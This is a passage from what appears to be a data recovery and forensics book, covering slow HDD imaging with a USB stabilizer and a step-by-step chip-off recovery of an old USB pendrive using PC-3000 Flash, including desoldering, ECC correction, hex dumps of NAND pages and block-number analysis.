The Sector Map tab shows the imaging progress:
12.18 - USB Stabilizer first imaging pass
Here you can see very well how the imaging works - the spikes where the drive reads at decent speed are broken up by bad areas which were skipped.
For the second pass I use the following settings:
12.19 - DMDE imaging settings - Source and destination
With MRT I had used three passes - one skipping 2,560 sectors with a 2 or 3 second timeout instead of 500 ms, and then a third imaging pass reading sector by sector in reverse in PIO mode with a 10-second read timeout.
Here I don't have PIO, and I expected the second pass to end in the middle of the night or early morning, which would throw my time comparison with MRT completely off.
I decided to go straight to a 2,560-sector skip with 10 seconds of read timeout, reading the skipped sectors in reverse. This reads until the next bad sector occurs and marks everything between the first bad sector and the first bad sector found while reading in reverse as bad. This is not perfect, but it gets the job done somehow.
The imaging is occasionally painfully slow, but I am reading basically most of the sectors:
12.20 - USB Stabilizer second imaging pass
In the end, the USB Stabilizer and DMDE imaged the first 10% of the drive in a bit more than 1.5 days, and my "one pass instead of two" hack produced a few more bad sectors than MRT delivered in almost exactly one day.
The whole job would run approximately 16-17 days instead of 10, which is really good for a tool like that. I may still have some room for improvement, but I have to say I am impressed once again by DeepSpar's USB Stabilizer!
Last but not least, I would recommend cooling a drive which has to work 24 hours a day for multiple days to get imaged. An old case fan and an old power supply from a SATA-to-USB converter cable do this job in my lab.
Flash drive data recovery
Storage devices based on flash memory need to be handled differently. To understand how data recovery for such devices works, you need to understand how these devices function and how the manufacturers deal with certain limitations of the technology.
Flash drives are faster because there are no moving parts, and this also eliminates any kind of mechanical failure or mechanical degradation over time. The data is stored in memory cells in the form of an electric charge. These cells degrade as data is written to them. That means the vendors have to come up with some clever ideas to prevent flash drives from failing too soon. Strongly generalized, these measures are:
• Wear leveling, which ensures that writes are distributed evenly across all memory cells.
• Obfuscation/randomisation of data to ensure there are no patterns which can cause uneven wear within a memory page (a group of memory cells and the smallest unit which gets written to); one common scheme is sketched after this list.
• A good supply of spare space to replace failing memory cells, pages or blocks (a block is a group of pages and the smallest unit which can be erased).
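One widespread randomisation scheme is simply XORing each page with a controller-specific pseudo-random pattern; chip-off tools have to undo this before the dump makes any sense. A minimal sketch with a made-up whitening pattern (real controllers derive theirs differently, often per page):

```python
# XOR "whitening" sketch: the same operation randomises data on write and
# de-randomises it on read. The pattern here is made up; real controllers
# use their own, often per-page, pseudo-random sequences.
import itertools

PATTERN = bytes([0x5A, 0xA5, 0x3C, 0xC3])  # hypothetical whitening pattern

def xor_whiten(data: bytes) -> bytes:
    return bytes(b ^ p for b, p in zip(data, itertools.cycle(PATTERN)))

page = b"user data as stored by the filesystem"
stored = xor_whiten(page)          # what actually lands in the NAND cells
print(stored[:8].hex())            # looks like noise
print(xor_whiten(stored) == page)  # True - XOR is its own inverse
```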
Board-level repair
First of all, you need to know whether the issue is hardware- or firmware-related. The easiest approach is to repair a hardware defect like a broken connector or a blown/shorted capacitor. All you need for this is a soldering station, tweezers and, in most cases, a microscope.
Fully encrypted devices
Then you need to distinguish between fully encrypted and obfuscated devices. Basically all SSDs use full hardware encryption to obfuscate and randomize data. This is also true for a tiny fraction of pendrives.
To recover data from these devices you need professional data recovery tools like:
• PC-3000 UDMA²⁷⁷/Express with SSD plug-in (does not support NVMe SSDs)
• PC-3000 Portable III²⁷⁸ with SSD plug-in (also supports NVMe SSDs)
• MRT Express²⁷⁹ with SSD plug-in (supports just a few SATA SSDs)
The process, in a very generalized form, is quite easy. You need to short some pins on the SSD to put the device into the so-called technology mode, which allows the data recovery hardware to upload a so-called loader.
²⁷⁷https://www.acelab.eu.com/pc3000.udma.php
²⁷⁸https://www.acelab.eu.com/pc-3000-portable-iii-systems.php
²⁷⁹http://en.mrtlab.com/mrt-pro
This loader will restore access to the data if the device is supported.
The good news is that many devices nowadays are based on the same controllers (e.g. Phison), but you are still very far from the over 90% success rate a data recovery lab can reach with HDD cases.
If the device is not supported, an investigator could theoretically reverse-engineer the firmware of a working model and try to find the issue. This is basically what the vendors of data recovery tools do. Doing that for a single case would be an enormous amount of work and would not fit within the budget and/or time frame of a normal investigation. So, if the device is not supported, you are usually out of luck.
Without somehow-working firmware which handles the decryption of data and the translation from LBA addresses to the correct memory locations, you are not able to get any data at all.
Chip-off data recovery
Most pendrives and memory cards do not have hardware encryption. This is the reason why these devices can be handled with a so-called chip-off data recovery. As the name suggests, the memory chips get removed and you read the data directly from the NAND chips.
If you do so, you have to reverse the things which were done to the data when it was recorded. This is usually the job of the controller, but if you are doing a chip-off you skip the controller and have to do its work yourself.
I will demonstrate the process with PC-3000 Flash²⁸⁰ and a pendrive chip-off recovery. I chose PC-3000 Flash because Ace Lab offers the best support in the data recovery field and PC-3000 Flash comes with a large database of already known working solutions.
This makes it much easier to get started!
The only available alternative is VNR from Rusolut²⁸¹. This tool doesn't offer a database of already known solutions, but it is very sophisticated and powerful.
The third vendor (Flash Extractor) went out of business; the tool is only available used, and there is no professional support or further development anymore. That's why I would not recommend it at all.
The process is basically the same with all tools, but the way a case is handled differs. If you understand the general process, you will be able to work with each tool!
Desoldering and preparation
First you have to desolder the memory chip:
²⁸⁰https://www.acelab.eu.com/pc3000flash.php
²⁸¹https://rusolut.com/
12.21 - pendrive with one NAND chip and USBest controller
This is a very old USB pendrive with a USBest controller (model UT163-T6). Since the controller
model was hard to read, I used a little trick. I painted the surface of the controller with a paint pen
and then carefully cleaned the surface with a swab dipped in 99% isopropyl alcohol. After this only
a little paint remains in the recesses on the controller and the text is very easy to read.
Here you have a TSOP48 chip. This package has 48 legs (24 on each side) and is by far the most
commonly used design for NAND chips. This is simply due to the fact that this design does not
require any special additional equipment for pick-and-place machines and thus saves manufacturers
additional investments.
For desoldering I use my Yihua YH-853AAA all-in-one soldering station:
12.22 - Yihua YH-853AAA with pendrive after desoldering of the chip
This soldering station offers a soldering iron, a preheating plate and a hot air nozzle in one.
For small boards such as USB sticks or SD memory cards, I usually use a “third hand” to hold the
boards. This makes it easier to fix the small boards in the right place.
First, I activate the preheating plate and let it heat up to 180°C. At the same time, I put a little flux
on the contacts and as soon as the 180°C has been reached, I activate the hot air nozzle with about
200°C for 30-40 seconds.
I do not use an attachment for the hot air nozzle for larger components like this TSOP48 chip. For
TSOP48 chips, there are also special attachments that primarily direct the hot air to the legs. I would
also recommend these to beginners to make the process even gentler.
The procedure I described is intended for BGA chips that do not have legs, but pads on the underside
of the chip. But I also handle TSOP chips this way…
Then I swing the hot air nozzle away and use the soldering iron with a little lead-containing solder to lower the melting point of the lead-free solder on the board. To do this, I quickly go over the contacts with leaded solder at a set temperature of 400°C.
Then I swing the hot air nozzle back, increase the temperature at my hot air station to about 380°C, and use a fairly low air flow to avoid blowing small components off the board!
To pick up the chip I then use a vacuum lifter.
I recommend practising this with an old pendrive. If you can solder the chip out and back in several times with the stick still working afterwards, you are ready for the first real cases.
Do not take the values I mentioned as given, but find the right values for your own soldering station!
The temperature specifications depend on the sensor and the position of the sensor. I know from an
experiment with a thermal imaging camera that a setting of 400°C corresponds to about 350°C at the
tip of my soldering iron.
Depending on the distance and other factors, the set temperature is very different from the
temperature acting on the chip. In general, you want to solder so hot that you can remove the
chip in a few seconds and not heat the chip at 300°C for multiple minutes.
Therefore, it is important to find suitable settings on your own soldering station. But you don’t want
to solder so hot that chips get damaged!
With more expensive soldering stations, the set values will tend to be closer to the actual values. My Yihua station is a quite cheap but also very compact model and has served me well for years. You are welcome to invest a four-figure sum in Weller or JBC equipment, but for the amount of soldering work I do, it would be overkill.
A training phase to get to know the equipment will be necessary even with high-quality soldering
stations…
As soon as the chip is removed, it is necessary to clean the contacts. I use a small piece of desoldering
wick that I cut off. Copper is a good conductor of heat and you want to clean the contacts with the
desoldering wick and not heat 3 meters of the desoldering wick. That’s exactly why I cut off a 1.5 –
2cm long piece.
I place the chip on a silicone solder mat, put some flux on the legs and then I put the desoldering
wick on the legs. Then I use the soldering iron with the previously mentioned 400°C as temperature
setting and a slightly wider chisel tip to transfer as much heat as possible.
Do not try to push the wick back and forth - you would risk bending the legs. Also, make sure to heat the desoldering wick continuously before removing it so that it does not adhere to one of the legs.
If you have problems detaching the desoldering wick from the legs, don't use force; use the hot air nozzle at 300°C to "help" the soldering iron. This allows you to remove the desoldering wick within seconds.
With BGA chips, the desoldering wick can easily be pushed over the pads if it has the right temperature. Do not apply force here either! The pads are torn off faster than you think! As soon as the right temperature is reached and enough flux is used, the piece of desoldering wick glides over the contacts as if by itself.
After both sides of the legs are free of solder, I use a very soft toothbrush and a few drops of isopropyl
alcohol to clean the chip roughly. Then I use cotton swabs dipped in IPA to clean the silicone mat
and the chip.
Afterwards the chip can be inserted into the reader. Alternatively, you can tin the matching adapter
board and solder the chip. I always use lead-containing solder to keep the soldering temperature a
little lower.
If a TSOP48 chip is not detected in the corresponding adapter, this may be due to residues of rosin-containing fluxes or oxidation of the legs. In this case, it is often helpful to place the chip with the legs facing down on a hard surface and carefully clean the tops of the legs with a scalpel:
12.23 - Cleaning TSOP-48 legs with a scalpel
For data recovery, I mark each chip with the last two digits of the case number. For this book I used single-digit numbers for the examples in order not to confuse these chips with a real data recovery! Each chip has a marking for pin 1, a number for the case and a Roman numeral for the chip position on the PCB.
Practical example - chip-off recovery for an old 512MB pendrive
Once the chips have been prepared, you can read them with PC-3000 Flash. To do this, you must first
create a new case. When you start the PC-3000 Flash software, you see the following dialog:
12.24 - Select adapter dialog
Here you tick Use adapter and then you click OK.
In the next step, you are asked for a folder name for the case:
12.25 - Setting the case name
I always name the folder with the case number plus the prefix DR for data recovery or FI for forensic
investigation.
Here I use DR_12345 as an example.
Then you have to determine where the data should be read from:
12.26 - Device selection dialog
Here you can either select the PC-3000 Flash Reader (first line) or a USB device like the DeepSpar
USB Stabilizer shown here. This means you can easily use PC-3000 Flash for a logical data recovery
as well. You could also load a dump from a file.
I use the USB chip reader for this example. Confirm the selection with Next>.
In the next step, you need to provide the key data of the case:
12.27 - Set controller and number of chips
The translation from Russian is not always perfect. The first field, Number of chip, should
actually be called "Number of chips", because you have to specify the number of chips and not the
position of the chip you are going to read.
Once set, this information can no longer be adjusted!
The specified controller is important later for searching the Solution Center for an already
known solution…
By clicking on Next> you confirm these entries.
In the last step, you can enter more information for the case:
12.28 - Set additional information/notes
By clicking OK you create the case and open it immediately:
12.29 - Read the chip ID
In this case, you see only one chip, as specified when creating the case. If you had specified a larger
number of chips, you would now have several chips in the list that you would need to fill with data.
PC-3000 Flash is very context-menu driven.
The first step in creating the dump is to read the ID of the chip. Via the ID, PC-3000 Flash recognizes
which settings are necessary for reading the chip.
To do this, you right-click on 1 – Unknown chip. This brings up the context-menu as shown above.
In it you select the entry Read chip ID and then the following dialog appears:
12.30 - Chip ID found
The appropriate values have already been set by the adapter you used and usually there is no need
to activate further options.
The read process starts automatically and all possible modes are tried. If the ID is read successfully,
the window disappears.
If there are read errors, they are displayed as red lines. There are partial read errors, in which some
values are found, and full read errors like the one shown below, where not a single value is
determined for Chip ID, Parts or Base:
12.31 - Chip ID reading error
In this case, you should clean the chip with a scalpel as previously described. If that does not help,
the chip is most probably dead and there is no way to recover the data.
If the ID is recognized, the chip name changes:
12.32 - Read chip
With a right-click you get the context-menu again and then you need to select Read chip to start
the first reading pass:
12.33 - Reading mode selection dialog
The dialog shown above allows you to select the reading mode. The Direct reading mode is only
intended for testing the reading options and should therefore only be used in exceptional cases.
Normally you select Reading to file dump to write the data from the chip to a file. Then you
confirm this with Select.
12.34 - Reading parameters dialog (normal)
In this step, you choose the reading speed and some more settings.
You get the advanced settings by clicking on Extended>>:
12.35 - Reading parameters dialog (extended)
Here you can already perform some analysis or verification of the data while reading or restart the
chip with a power reset after a read error.
I’m not a fan of running the analyses while copying the data. Auto-verification may make sense for
some chips because the data is read several times and then the most likely result is stored.
As a rule, the ECC correction and re-reading works better!
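If you are curious what such an auto-verification does conceptually, the idea can be sketched in a
few lines of Python. This is only an illustration of the principle of majority voting over repeated
reads, not PC-3000's actual implementation:

from collections import Counter

def majority_vote(reads):
    # reads: several raw reads of the same page;
    # keep the most frequent value for each byte position
    return bytes(Counter(col).most_common(1)[0][0]
                 for col in zip(*reads))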
A click on Apply starts reading:
12.36 - Reading process running
Then you have to correct the data which you just read by performing the ECC correction and, if
necessary, re-reading the uncorrectable pages using special re-reading methods.
To do this, you open the newly added item Results of preparation in the left pane and then click
on the item 0001 Transformation graph.
The transformation graph is the area in which you will work from now on. This is where all
transformations are carried out with which you go from a physical to a logical image.
To trigger the ECC correction, right-click on entry 0 in the Items column. If you have previously
defined two or more chips, you would now see a sub-column with the chip-number (0, 1, …) in
Items per chip. Then you would have to perform the ECC correction and re-reading for each chip
individually.
To start the ECC correction you select Data correction via ECC -> ECC autodetection:
12.37 - Start ECC correction
This analysis may take some time depending on the size of the dump.
If the ECC data cannot be determined during the fast analysis, you will be asked whether a complete
analysis should be performed.
Once ECC data is found, you see the following question:
12.38 - ECC data found dialog
After clicking the Yes button, you see the following in the Log tab:
>>>>>>>>>>>>>>>>>>> Detect ECC for sector = 528 bytes
Check ECC process ****************
start time 9/4/2022 4:28:43 PM
finish time 9/4/2022 4:28:45 PM
------------------------------------------------------------------
total time 00:00:02
******************************************************************
The information that a sector is 528 bytes long will be needed later. I suggest noting down such
things, as the log may get very long over time. That's why I have a notebook and a pen next to each
data recovery workstation!
Then you can perform the re-reading based on the ECC data. Only pages that could not be corrected
during the ECC correction are re-read.
To do this, right-click on item 0 and then on Tools -> Read Retry -> ReadRetry mode checking:
12.39 - Find re-reading methods
After that, you get a list of possible read retry modes:
12.40 - Re-read method list
This list is sorted by probability. You can see from the 1% rating that this very old chip does
not support special re-reading commands, or that the appropriate commands for this chip are not
available in PC-3000 Flash.
In such a case, I check how many sectors are faulty.
To do this, right-click again on item 0 and then select the entry Map from the context menu:
12.41 - Start map building
Here you see a pictorial representation of all read pages. To see the bad sectors, you click on the
down arrow next to ECC in the toolbar and then you select the entry Create submap use ECC info:
12.42 - Start building submap based on ECC info
Then you see the following window:
12.43 - Select parameters for submap
Here you select Invalid sectors and click OK.
Then you get a graphical overview of the bad sectors:
12.44 - Uncorrected sectors
In this case, there are only 4 bad sectors, i.e. 1 page.
In the next step, with such an old pendrive, you have to check whether the data has been scrambled
or not.
This scrambling can be done in one of the following three ways (a minimal sketch of the first two
follows the list):
1. Bitwise inversion
2. XOR
3. Encryption
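Once the scheme and its parameters are known, the first two can be undone with a few lines of code.
A minimal Python sketch; the XOR key is a placeholder, as the real patterns are controller-specific:

def unscramble_invert(data: bytes) -> bytes:
    # bitwise inversion: every byte is XORed with 0xFF
    return bytes(b ^ 0xFF for b in data)

def unscramble_xor(data: bytes, key: bytes) -> bytes:
    # XOR with a repeating key pattern
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))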
To check whether the data is scrambled, right-click on entry 0 under Items and then select the entry
Raw recovery:
12.45 - Start RAW recovery
The following window will appear. Here you can initiate the search for files by clicking on the play
button in the toolbar. After that, you can look at the data sorted by file type:
12.46 - RAW recovery results
Since PC-3000 found some files, there is no scrambling. However, when you open an image, the file
is damaged:
12.47 - Image-fragments in wrong order
The data is readable but the order of the data is completely wrong because of the wear leveling!
Next, look at the entries under FAT folder. This is the data that defines a folder in the FAT
filesystem. These entries are usually quite short and fit within a single page.
This makes them ideal for use in the Page Designer. To do this, right-click on the entries in the
list and then select Add to search results:
12.48 - Add search results
The following dialog appears:
12.49 - Define results ID
Confirm the ID with OK.
Then everything is ready for splitting the pages into sectors with the page designer.
Open the page designer again via the context-menu:
12.50 - Open page designer
The following window will appear:
12.51 - Page designer window
Here you can see the content of a page in the left pane. To the right, you can define and edit the
division of pages into individual sectors. Just below that, you find the previously added search results.
As soon as you click on one of the search results, you see the first page in which the data of this file
is stored.
A page contains a certain number (4, 8, 16, 32, …) of sectors in the so-called data area (DA) and some
additional bytes. These additional bytes are called the service area (SA) and they contain ECC data
and markers.
Each page conversion must consist of sectors with 512 bytes in the data area and at least 2 bytes in
the service area, so the smallest possible fragments are 514 bytes per sector. Of course, several data
areas can also follow each other directly, with the service areas for the individual sectors located
at the end of the page or in one block after 2 or 4 sectors. In addition, one of the service areas can
be larger and contain service data for both the sector and the entire page.
However, an unequal division of the page into sectors with service areas of different sizes
is the exception. As a rule, the service areas of all sectors are the same size!
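As a minimal sketch of what such a page conversion does, assuming the simplest layout in which
each data area is directly followed by its service area (the sizes are parameters and must be
determined per chip):

def split_page(page: bytes, da_len: int = 512, sa_len: int = 16):
    # split one raw page into (data_area, service_area) pairs
    sector_len = da_len + sa_len
    sectors = []
    for off in range(0, len(page), sector_len):
        sectors.append((page[off:off + da_len],
                        page[off + da_len:off + sector_len]))
    return sectors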
Whether the data can be de-scrambled with XOR depends on the page layout, so often no manual
page conversion has to be carried out: the layout is detected automatically after applying XOR and
suggested to the user.
Now let’s take a closer look at a page:
0x0000 2E20 2020 2020 2020 2020 2010 0000 4CA1 . ...L¡
0x0010 B54A B54A 0100 4CA1 B54A 5FAA 0000 0000 µJµJ..L¡µJ_ª....
0x0020 2E2E 2020 2020 2020 2020 2010 0000 4CA1 .. ...L¡
0x0030 B54A B54A 0000 4CA1 B54A 0000 0000 0000 µJµJ..L¡µJ......
0x0040 4174 0061 0072 0067 0065 000F 0068 7400 At.a.r.g.e...ht.
0x0050 2E00 7400 7800 7400 0000 0000 FFFF FFFF ..t.x.t.....ÿÿÿÿ
0x0060 5441 5247 4554 2020 5458 5420 0000 4CA1 TARGET TXT ..L¡
0x0070 B54A B54A 0100 04A1 B54A 60AA 2300 0000 µJµJ...¡µJ`ª#...
0x0080 416C 006F 0067 0000 00FF FF0F 0000 FFFF Al.o.g...ÿÿ...ÿÿ
0x0090 FFFF FFFF FFFF FFFF FFFF 0000 FFFF FFFF ÿÿÿÿÿÿÿÿÿÿ..ÿÿÿÿ
0x00A0 4C4F 4720 2020 2020 2020 2020 0000 4CA1 LOG ..L¡
0x00B0 B54A B54A 0100 06A1 B54A 61AA 4518 0000 µJµJ...¡µJaªE...
0x00C0 4265 0000 00FF FFFF FFFF FF0F 0050 FFFF Be...ÿÿÿÿÿÿ..Pÿÿ
0x00D0 FFFF FFFF FFFF FFFF FFFF 0000 FFFF FFFF ÿÿÿÿÿÿÿÿÿÿ..ÿÿÿÿ
0x00E0 0173 0065 0073 0073 0069 000F 0050 6F00 .s.e.s.s.i...Po.
0x00F0 6E00 2E00 7300 7100 6C00 0000 6900 7400 n...s.q.l...i.t.
0x0100 5345 5353 494F 7E31 5351 4C20 0000 4CA1 SESSIO~1SQL ..L¡
0x0110 B54A B54A 0100 01A1 B54A 63AA 0040 0000 µJµJ...¡µJcª.@..
0x0120 4164 0075 006D 0070 0000 000F 0068 FFFF Ad.u.m.p.....hÿÿ
0x0130 FFFF FFFF FFFF FFFF FFFF 0000 FFFF FFFF ÿÿÿÿÿÿÿÿÿÿ..ÿÿÿÿ
0x0140 4455 4D50 2020 2020 2020 2010 0000 4CA1 DUMP ...L¡
0x0150 B54A B54A 0100 4CA1 B54A 67AA 0000 0000 µJµJ..L¡µJgª....
0x0160 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0170 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0180 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0190 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x01A0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x01B0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x01C0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x01D0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x01E0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x01F0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0200 1345 1345 FFFF D30E 4199 E706 F629 8ACD .E.EÿÿÓ.A™ç.ö)ŠÍ
0x0210 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0220 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0230 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0240 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0250 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0260 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0270 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0280 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0290 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x02A0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x02B0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x02C0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x02D0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x02E0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x02F0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0300 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0310 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0320 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0330 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0340 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0350 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0360 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0370 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0380 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0390 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x03A0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x03B0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x03C0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x03D0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x03E0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x03F0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0400 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0410 1345 1345 FFFF F4C9 7794 01D7 3C7F CEB9 .E.EÿÿôÉw”.×<.ι
0x0420 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0430 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0440 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0450 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0460 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0470 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0480 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0490 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x04A0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x04B0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x04C0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x04D0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x04E0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x04F0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0500 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0510 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0520 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0530 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0540 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0550 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0560 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0570 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0580 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0590 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x05A0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x05B0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x05C0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x05D0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x05E0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x05F0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0600 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0610 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0620 1345 1345 FFFF F4C9 7794 01D7 3C7F CEB9 .E.EÿÿôÉw”.×<.ι
0x0630 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0640 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0650 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0660 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0670 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0680 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0690 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x06A0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x06B0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x06C0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x06D0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x06E0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x06F0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0700 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0710 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0720 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0730 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0740 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0750 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0760 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0770 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0780 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0790 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x07A0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x07B0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x07C0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x07D0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x07E0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x07F0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0800 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0810 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0820 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0830 1345 1345 FFFF F4C9 7794 01D7 3C7F CEB9 .E.EÿÿôÉw”.×<.ι
You can see clearly that after 512 bytes of data there are 16 bytes of service area, and that there
are 4 sectors in a page.
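The first 512 bytes of this page are ordinary 32-byte FAT directory entries, so you can even
sanity-check the dump outside of PC-3000. A minimal Python sketch that prints the 8.3 short names
(long-name entries carry the attribute 0x0F at offset 11 and are skipped):

def list_short_names(data_area: bytes):
    # walk 32-byte FAT directory entries and print the 8.3 names
    for off in range(0, len(data_area) - 31, 32):
        entry = data_area[off:off + 32]
        if entry[0] in (0x00, 0xE5):   # unused or deleted entry
            continue
        if entry[11] == 0x0F:          # VFAT long-name entry
            continue
        name = entry[0:8].decode("ascii", "replace").strip()
        ext = entry[8:11].decode("ascii", "replace").strip()
        print(name + "." + ext if ext else name)

Run against the data areas of the page above, this prints ., .., TARGET.TXT, LOG, SESSIO~1.SQL
and DUMP.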
The 512 + 16 bytes per sector result in the 528 bytes previously recognized by ECC. To do the split
manually, you can right-click the Page entry in the Tree tab and use Divide proportionally from the
context-menu. This will open the following window:
12.52 - Divide page proportionally
Then enter 4 so that the page gets divided into 4 sectors and confirm this with Apply. After that,
the program asks if you want to allocate the parts to the sector definitions:
12.53 - Add parts to sectors dialog
Confirm this with Yes and you get 4 sectors of 528 bytes each…
To divide these sectors into data and service area, right-click on the range entry and select Divide
from the context-menu:
12.54 - Divide sectors in DA and SA
Then enter the length of the data area in bytes and confirm this with Apply:
12.55 - Sector length
Once you have done this for all sectors, the page conversion looks like this:
12.56 - Finished page conversion
A page conversion would not even have been necessary for this example, but this rather manageable
page conversion was ideal for showing the process…
Click on the down arrow next to the play button in the toolbar and then on Apply to add the page
conversion to the transformation graph
12.57 - Apply page conversion
… and the following message appears:
12.58 - Transformation successful messagebox
Confirm that with OK and you will find another line in the transformation graph:
12.59 - Transformation graph with newly added page conversion
The transformation graph is basically a list of all the conversion steps that are applied to the dump.
In order to get the data in the right order, you have two main options:
• a block number, where a field within the service area is used to bring the data into the correct
order, or
• a translator, which is the newer and more complex method of bringing the data into the right order!
To see if you are dealing with a block number algorithm, you can look at the service information
of all sectors. To do this, you right-click on item 0 in the second line of the transformation graph
(Page conversion) and select Service information from the context-menu.
After that, you will see the following window:
12.60 - Service information, top sectors
Each line shows the 16 bytes of the service area of one sector.
Since in a block number algorithm the block numbering is at the beginning of the service area, you
scroll through the data.
While the rear bytes are constantly changing, the first 6 bytes only ever show the value 0x00.
So, I scroll down a little further and see the following:
12.61 - Service information, later sectors
Here again the first 6 bytes remain the same and the other 10 bytes are constantly changing.
12.62 - Service information, further down
A bit further down you see the same picture. If you pay close attention to the transition from block
00138 to 00139, you see that with the block, the first few bytes also change.
So, you clearly have a pendrive that works based on one of the block number algorithms. Which
one exactly can be determined by research or by trial and error.
You can also use the Solution Center for research. To do so, right-click on the headline Chips in the
left pane and select Search solution from the context-menu. The solutions will be searched based
on the controller model you entered when creating the case and the ID read from the chip.
I want to demonstrate the trial-and-error approach here.
To do this, right-click again on the item 0 in the last line in the transformation graph and then
select Data analysis -> Block number -> Block number (Type 1) [0x0000]:
12.63 - Try block number 0000
The Type 1 algorithm [0x0000] is usually quite universal and is my first choice. Type 2 is for a
different controller and Type 4 would be for a Kingston SD card, so you can exclude those in this
example.
If Type 1 doesn't fit, you can try Type 5, Type 7 and Type 9 …
As soon as you click on the entry for Type 1, you see the following window:
12.64 - Block number type 0000 dialog
For the first attempt, activate the Autodetect checkbox and start the process. Then you see the
following output in the log tab:
[05.09.2022 11:09:25]: Applying method : Block number (Type 1) [0x0000]...
